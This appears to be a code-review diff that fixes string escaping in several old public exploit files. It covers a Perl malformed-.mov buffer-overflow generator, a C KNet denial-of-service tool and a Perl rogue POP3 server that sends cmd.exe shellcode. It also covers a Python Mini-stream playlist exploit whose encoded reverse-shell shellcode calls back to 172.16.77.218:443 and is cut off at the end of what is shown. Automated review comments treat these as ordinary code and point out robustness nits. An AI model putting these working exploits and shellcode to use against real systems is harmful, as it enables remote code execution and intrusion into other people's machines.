@ -62,19 +62,19 @@ but out of luck, i guess someone will maybe be able to do some magic tricks :)
use strict;

my $movfile =
\"\\x00\\x00\\x00\\x7d\\x6d\\x6f\\x6f\\x76\\x00\\x00\\x00\\x75\\x72\\x6d\\x72\\x61\\x00\\x00\\x00\\x6d\".
\"\\x72\\x6d\\x64\\x61\\x00\\x00\\x00\\x55\\x72\\x64\\x72\\x66\\x00\\x00\\x00\\x00\\x75\\x72\\x6c\\x20\".
\"\\x00\\x00\\x00\\x41\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x32\\x37\\x2e\\x30\\x2e\\x30\\x2e\\x31\".
\"\\x2f\\x74\\x65\\x73\\x74\\x2e\\x6d\\x6f\\x76\\x00\\x00\\x00\\x00\\x10\\x72\\x6d\\x64\\x72\\x00\\x00\".
\"\\x00\\x00\\x00\\x00\\x05\\x78\".
\"\\x41\\x42\\x43\\x44\". #EDI here
\"\\x61\\x62\\x63\\x64\". #EAX here
\"\\x41\\x41\\x41\\x41\\x41\\x41\".
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x44\\x44\\x44\\x44\\x41\\x41\\x43\\x43\".
\"\\x43\\x41\\x41\\x41\\x42\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";
"\x00\x00\x00\x7d\x6d\x6f\x6f\x76\x00\x00\x00\x75\x72\x6d\x72\x61\x00\x00\x00\x6d".
"\x72\x6d\x64\x61\x00\x00\x00\x55\x72\x64\x72\x66\x00\x00\x00\x00\x75\x72\x6c\x20".
"\x00\x00\x00\x41\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31".
"\x2f\x74\x65\x73\x74\x2e\x6d\x6f\x76\x00\x00\x00\x00\x10\x72\x6d\x64\x72\x00\x00".
"\x00\x00\x00\x00\x05\x78".
"\x41\x42\x43\x44". #EDI here
"\x61\x62\x63\x64". #EAX here
"\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x44\x44\x44\x41\x41\x43\x43".
"\x43\x41\x41\x41\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";


open(out, \"> test.mov\");
open(out, "> test.mov");
binmode(out);
print (out $movfile);
close(out);
@ -11,7 +11,7 @@

-=[+] Application: Knet
-=[+] Version: 1.04c
-=[+] Vendor\'s URL: www.stormystudios.com
-=[+] Vendor's URL: www.stormystudios.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
@ -68,27 +68,27 @@ if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf(\"\\n\\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\\n\");
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), \'\\0\', 8);
printf(\"\\n\\nConnecting to target \\t...\");
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf(\"[Done]\\nBuilding evil buffer\\t...\");
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf(\"[Done]\\nSending evil request \\t...\");
sprintf(request,\"GET %s \\n\\r\\n\\r\",evilbuf);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf(\"[Done]\\n\\n[Finished] Check the server now\\n\");
printf("[Done]\n\n[Finished] Check the server now\n");
}
else
printf(\"[Fail] -> Unable to connect\\n\\n\");
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;

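Review bot: `he = gethostbyname(argv[1]);` is never checked for NULL before `trg.sin_addr = *((struct in_addr *) he->h_addr);`, so an unresolvable hostname crashes the tool instead of reporting an error; the other C files in this diff test the result and `exit(-1)`. The `socket()` and `malloc(12344)` results are likewise unchecked, and `memset(evilbuf,90,1023)` writes no terminating NUL, so the `%s` in `sprintf(request,"GET %s \n\r\n\r",evilbuf)` relies on `evilbuf` being declared larger and zero-initialised outside this hunk. Style: `"\n\r\n\r"` has the terminator order reversed relative to the `\r\n` used by the other files in this diff.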
@ -96,10 +96,10 @@ return 0;

void help(char *program_name) {

printf(\"\\n\\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\\n\");
printf(\"\\t-=[ ]=-\\n\");
printf(\"\\t-=[ Coded by ders -/www.x0n3-h4ck.org\\\\- ]=-\\n\\n\");
printf(\"Usage: %s <Host> <Port>\\n\",program_name);
printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
printf("\t-=[ ]=-\n");
printf("\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
printf("Usage: %s <Host> <Port>\n",program_name);
}

// milw0rm.com [2005-02-25]
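Review bot: `"\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n"` keeps a doubled backslash after unescaping (`\\\\-` to `\\-`), which is the correct C source for a literal backslash; this line is a good regression check for the conversion, since a second pass would reduce it to `\-`, an invalid escape sequence. Minor: the banner here says `1.04b` while the main banner in the previous hunk and the header block say `1.04c`.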
@ -8,7 +8,7 @@ Exploitation: remote BoF

Date: 2009-10-06

Author: Francis Provencher (Protek Research Lab\'s)
Author: Francis Provencher (Protek Research Lab's)

Special Thanks to: M Jeremy Brown

@ -65,25 +65,25 @@ $port = 110;

# Simple cmd.exe

$sc2 = \"\\xB8\\xFF\\xEF\\xFF\\xFF\\xF7\\xD0\\x2B\\xE0\\x55\\x8B\\xEC\" .
\"\\x33\\xFF\\x57\\x83\\xEC\\x04\\xC6\\x45\\xF8\\x63\\xC6\\x45\" .
\"\\xF9\\x6D\\xC6\\x45\\xFA\\x64\\xC6\\x45\\xFB\\x2E\\xC6\\x45\" .
\"\\xFC\\x65\\xC6\\x45\\xFD\\x78\\xC6\\x45\\xFE\\x65\\x8D\\x45\" .
\"\\xF8\\x50\\xBB\\xC7\\x93\\xBF\\x77\\xFF\\xD3\";
$sc2 = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" .
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" .
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" .
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" .
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";


$serv = IO::Socket::INET->new(Proto=>\'tcp\',
$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die \"Error: listen($port)\\n\";
or die "Error: listen($port)\n";

$cli = $serv->accept() or die \"Error: accept()\\n\";
$cli = $serv->accept() or die "Error: accept()\n";

$retaddr = pack(\'l\', $ret);
$junk = \"A\" x 709;
$retaddr = pack('l', $ret);
$junk = "A" x 709;


$payload = \"-ERR \" . $junk . $retaddr . \"\\x90\" x 1 . $sc2 . \"\\r\\n\"; # 714 to overwrite EIP
$payload = "-ERR " . $junk . $retaddr . "\x90" x 1 . $sc2 . "\r\n"; # 714 to overwrite EIP

$cli->send($payload);

@ -11,63 +11,63 @@
# Downloadable from: http://mini-stream.net/
# Tested against WinXP SP2 and SP3 - English

outputfile=\\\\\\\"astley.pls\\\\\\\"
outputfile="astley.pls"


shellcode=\\\\\\\"\\\\\\\\x44\\\\\\\"*17403
#shellcode+=\\\\\\\"\\\\\\\\xed\\\\\\\\x1e\\\\\\\\x94\\\\\\\\x7c\\\\\\\" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+=\\\\\\\"\\\\\\\\x53\\\\\\\\x93\\\\\\\\x42\\\\\\\\x7e\\\\\\\" # JMP ESP - USER32.dll Win XP SP3
shellcode+=\\\\\\\"CAFE\\\\\\\"*8 # 32 Byte NOP Sled
shellcode="\x44"*17403
#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
shellcode+="CAFE"*8 # 32 Byte NOP Sled
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
shellcode+=(\\\\\\\"\\\\\\\\x89\\\\\\\\xe5\\\\\\\\xda\\\\\\\\xd6\\\\\\\\xd9\\\\\\\\x75\\\\\\\\xf4\\\\\\\\x58\\\\\\\\x50\\\\\\\\x59\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x43\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x51\\\\\\\\x5a\\\\\\\\x56\\\\\\\\x54\\\\\\\\x58\\\\\\\\x33\\\\\\\\x30\\\\\\\\x56\\\\\\\\x58\\\\\\\\x34\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x41\\\\\\\\x50\\\\\\\\x30\\\\\\\\x41\\\\\\\\x33\\\\\\\\x48\\\\\\\\x48\\\\\\\\x30\\\\\\\\x41\\\\\\\\x30\\\\\\\\x30\\\\\\\\x41\\\\\\\\x42\\\\\\\\x41\\\\\\\\x41\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x41\\\\\\\\x41\\\\\\\\x51\\\\\\\\x32\\\\\\\\x41\\\\\\\\x42\\\\\\\\x32\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x42\\\\\\\\x42\\\\\\\\x58\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x38\\\\\\\\x41\\\\\\\\x43\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4d\\\\\\\\x38\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x45\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x30\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x50\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x46\\\\\\\\x51\\\\\\\\x48\\\\\\\\x52\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x50\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x52\\\\\\\\x45\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x42\\\\\\\\x51\\\\\\\\x38\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x37\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x5a\\\\\\\\x51\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4c\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x51\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x42\\\\\\\\x46\\\\\\\\x4c\\\\\\\\x51\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4d\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x4d\\\\\\\\x32\\\\\\\\x4a\\\\\\\\x50\\\\\\\\x46\\\\\\\\x32\\\\\\\\x46\\\\\\\\x37\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x51\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x42\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x4c\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x30\\\\\\\\x42\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x55\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x34\\\\\\\\x50\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x48\\\\\\\\x45\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x58\\\\\\\\x47\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x48\\\\\\\\x53\\\\\\\\x4a\\\\\\\\x43\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x39\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4e\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x46\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x35\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x45\\\\\\\\x53\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x48\\\\\\\\x47\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x42\\\\\\\\x55\\\\\\\\x4b\\\\\\\\x52\\\\\\\\x50\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x47\\\\\\\\x54\\\\\\\\x43\\\\\\\\x31\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x49\\\\\\\\x43\\\\\\\\x45\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x45\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x31\\\\\\\\x49\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x34\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x31\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x39\\\\\\\\x50\\\\\\\\x5a\\\\\\\\x50\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x51\\\\\\\\x48\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x51\\\\\\\\x4a\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x52\\\\\\\\x4a\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x38\\\\\\\\x50\\\\\\\\x33\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x32\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x30\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x47\\\\\\\\x43\\\\\\\\x43\\\\\\\\x50\\\\\\\\x32\\\\\\\\x51\\\\\\\\x4f\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x51\\\\\\\\x44\\\\\\\\x42\\\\\\\\x48\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x47\\\\\\\\x46\\\\\\\\x46\\\\\\\\x43\\\\\\\\x37\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x55\\\\\\\\x4e\\\\\\\\x58\\\\\\\\x4a\\\\\\\\x30\\\\\\\\x45\\\\\\\\x51\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x50\\\\\\\\x47\\\\\\\\x59\\\\\\\\x48\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x34\\\\\\\\x46\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x47\\\\\\\\x59\\\\\\\\x4b\\\\\\\\x30\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x47\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x47\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x45\\\\\\\\x38\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x49\\\\\\\\x57\\\\\\\\x42\\\\\\\\x48\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x42\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x48\\\\\\\\x5a\\\\\\\\x42\\\\\\\\x48\\\\\\\\x45\\\\\\\\x52\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x36\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x50\\\\\\\\x50\\\\\\\\x56\\\\\\\\x51\\\\\\\\x47\\\\\\\\x43\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x59\\\\\\\\x49\\\\\\\\x35\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x45\\\\\\\\x31\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x43\\\\\\\\x58\\\\\\\\x42\\\\\\\\x43\\\\\\\\x42\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x53\\\\\\\\x51\\\\\\\\x47\\\\\\\\x46\\\\\\\\x37\\\\\\\\x50\\\\\\\\x57\\\\\\\\x46\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x46\\\\\\\\x43\\\\\\\\x5a\\\\\\\\x44\\\\\\\\x52\\\\\\\\x50\\\\\\\\x59\\\\\\\\x50\\\\\\\\x56\\\\\\\\x4a\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x47\\\\\\\\x34\\\\\\\\x46\\\\\\\\x44\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4c\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x47\\\\\\\\x34\\\\\\\\x51\\\\\\\\x34\\\\\\\\x42\\\\\\\\x30\\\\\\\\x48\\\\\\\\x46\\\\\\\\x45\\\\\\\\x50\\\\\\\\x50\\\\\\\\x44\\\\\\\\x51\\\\\\\\x44\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x46\\\\\\\\x36\\\\\\\\x50\\\\\\\\x56\\\\\\\\x46\\\\\\\\x36\\\\\\\\x47\\\\\\\\x36\\\\\\\\x51\\\\\\\\x46\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x50\\\\\\\\x56\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x36\\\\\\\\x46\\\\\\\\x33\\\\\\\\x51\\\\\\\\x46\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x49\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4f\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x56\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x51\\\\\\\\x46\\\\\\\\x47\\\\\\\\x36\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x45\\\\\\\\x58\\\\\\\\x4b\\\\\\\\x37\\\\\\\\x45\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x30\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x52\\\\\\\\x50\\\\\\\\x56\\\\\\\\x42\\\\\\\\x48\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x49\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x55\\\\\\\\x4f\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x43\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x36\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x4d\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x43\\\\\\\\x45\\\\\\\\x45\\\\\\\\x55\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x47\\\\\\\\x44\\\\\\\\x53\\\\\\\\x44\\\\\\\\x32\\\\\\\\x42\\\\\\\\x4f\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x50\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x33\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x41\\\\\\\\x41\\\\\\\")
|
||||
shellcode+=("\x89\xe5\xda\xd6\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
|
||||
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x45\x50"
|
||||
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4a\x45\x46\x51\x48\x52\x42"
|
||||
"\x44\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"
|
||||
"\x50\x52\x45\x44\x4c\x4b\x43\x42\x51\x38\x44\x4f\x48\x37\x51"
|
||||
"\x5a\x51\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
|
||||
"\x43\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48\x4f\x44"
|
||||
"\x4d\x43\x31\x4f\x37\x4d\x32\x4a\x50\x46\x32\x46\x37\x4c\x4b"
|
||||
"\x51\x42\x42\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c"
|
||||
"\x4b\x47\x30\x42\x58\x4d\x55\x49\x50\x44\x34\x50\x4a\x45\x51"
|
||||
"\x4e\x30\x46\x30\x4c\x4b\x50\x48\x45\x48\x4c\x4b\x50\x58\x47"
|
||||
"\x50\x45\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44"
|
||||
"\x4c\x4b\x43\x31\x4e\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
|
||||
"\x4c\x4f\x31\x48\x4f\x44\x4d\x45\x51\x4f\x37\x46\x58\x4d\x30"
|
||||
"\x44\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46"
|
||||
"\x44\x42\x55\x4b\x52\x50\x58\x4c\x4b\x51\x48\x47\x54\x43\x31"
|
||||
"\x49\x43\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
|
||||
"\x4c\x43\x31\x49\x43\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
|
||||
"\x4c\x49\x50\x44\x46\x44\x46\x44\x51\x4b\x51\x4b\x45\x31\x46"
|
||||
"\x39\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
|
||||
"\x4c\x4b\x44\x52\x4a\x4b\x4c\x46\x51\x4d\x45\x38\x50\x33\x50"
|
||||
"\x32\x45\x50\x43\x30\x42\x48\x43\x47\x43\x43\x50\x32\x51\x4f"
|
||||
"\x51\x44\x42\x48\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x48"
|
||||
"\x55\x4e\x58\x4a\x30\x45\x51\x45\x50\x45\x50\x47\x59\x48\x44"
|
||||
"\x46\x34\x46\x30\x43\x58\x47\x59\x4b\x30\x42\x4b\x45\x50\x4b"
|
||||
"\x4f\x49\x45\x46\x30\x50\x50\x46\x30\x50\x50\x47\x30\x46\x30"
|
||||
"\x47\x30\x50\x50\x45\x38\x4a\x4a\x44\x4f\x49\x4f\x4b\x50\x4b"
|
||||
"\x4f\x48\x55\x4c\x49\x49\x57\x42\x48\x4e\x4c\x42\x30\x50\x4d"
|
||||
"\x48\x5a\x42\x48\x45\x52\x45\x50\x45\x51\x4f\x4b\x4c\x49\x4d"
|
||||
"\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x43\x58\x4c\x59\x49\x35"
|
||||
"\x42\x54\x45\x31\x4b\x4f\x4e\x35\x43\x58\x42\x43\x42\x4d\x42"
|
||||
"\x44\x45\x50\x4c\x49\x4b\x53\x51\x47\x46\x37\x50\x57\x46\x51"
|
||||
"\x4b\x46\x43\x5a\x44\x52\x50\x59\x50\x56\x4a\x42\x4b\x4d\x42"
|
||||
"\x46\x4f\x37\x47\x34\x46\x44\x47\x4c\x45\x51\x43\x31\x4c\x4d"
|
||||
"\x47\x34\x51\x34\x42\x30\x48\x46\x45\x50\x50\x44\x51\x44\x50"
|
||||
"\x50\x46\x36\x50\x56\x46\x36\x47\x36\x51\x46\x50\x4e\x50\x56"
|
||||
"\x46\x36\x46\x33\x51\x46\x42\x48\x43\x49\x48\x4c\x47\x4f\x4d"
|
||||
"\x56\x4b\x4f\x48\x55\x4c\x49\x4d\x30\x50\x4e\x51\x46\x47\x36"
|
||||
"\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b\x37\x45\x4d\x45\x30\x4b"
|
||||
